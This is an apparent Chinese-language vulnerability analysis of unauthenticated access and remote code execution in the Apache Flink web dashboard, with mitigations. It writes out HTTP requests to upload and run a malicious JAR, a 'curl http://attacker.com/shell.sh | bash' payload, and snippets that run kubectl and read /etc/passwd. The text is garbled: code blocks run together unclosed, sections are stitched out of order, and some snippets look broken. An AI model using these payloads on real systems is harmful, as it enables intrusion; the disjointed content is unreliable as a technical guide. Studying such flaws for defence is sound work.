Apache Flink未授权访问+远程代码执行的示例分析

# Apache Flink未授权访问+远程代码执行的示例分析

## 一、漏洞背景

Apache Flink作为分布式流处理框架，在大数据领域广泛应用。其Web Dashboard默认监听8081端口，若未正确配置身份验证，攻击者可利用未授权访问漏洞获取集群控制权，进而通过恶意Job提交实现远程代码执行（RCE）。

## 二、漏洞复现环境

- **受影响版本**：Apache Flink ≤ 1.9.1（默认无认证）
- **测试环境**：
  - Flink 1.8.0 单机模式
  - Kali Linux攻击机
  - 目标IP: 192.168.1.100:8081

## 三、漏洞利用过程

### 1. 未授权访问验证
直接访问Web界面无需认证：
```bash
curl http://192.168.1.100:8081

POST /jars/upload HTTP/1.1
Host: 192.168.1.100:8081

（上传包含恶意类的JAR文件）

POST /jars/:jarid/run HTTP/1.1
Host: 192.168.1.100:8081
{
  "entryClass": "Exploit",
  "programArgs": "curl http://attacker.com/shell.sh | bash"
}

// 默认配置中无安全模块
SecurityConfiguration securityConfig = new SecurityConfiguration(config);
if(!securityConfig.isAuthenticationEnabled()) {
    // 允许所有请求
}

WebFrontend -> Dispatcher -> JobManager 
    -> TaskManager -> 加载恶意字节码

Kryo kryo = new Kryo();
kryo.register(EvilClass.class);  // 恶意类注册

# conf/flink-conf.yaml
security.ssl.enabled: true
security.kerberos.login.enable: true
web.access-control-allow-origin: "*" → 指定域名

iptables -A INPUT -p tcp --dport 8081 -s trusted_ip -j ACCEPT
iptables -A INPUT -p tcp --dport 8081 -j DROP

// 强制认证拦截器
public class AuthInterceptor implements HandlerInterceptor {
    @Override
    public boolean preHandle(HttpServletRequest request, 
                           HttpServletResponse response, 
                           Object handler) {
        if (!checkAuth(request)) {
            response.sendError(403);
            return false;
        }
    }
}

# 在Job中执行kubectl命令
Runtime.getRuntime().exec("kubectl get pods -n kube-system");

# 恶意PyFlink代码示例
env.execute_sql("CREATE TABLE hacker_table WITH ('connector'='filesystem', 'path'='/etc/passwd')")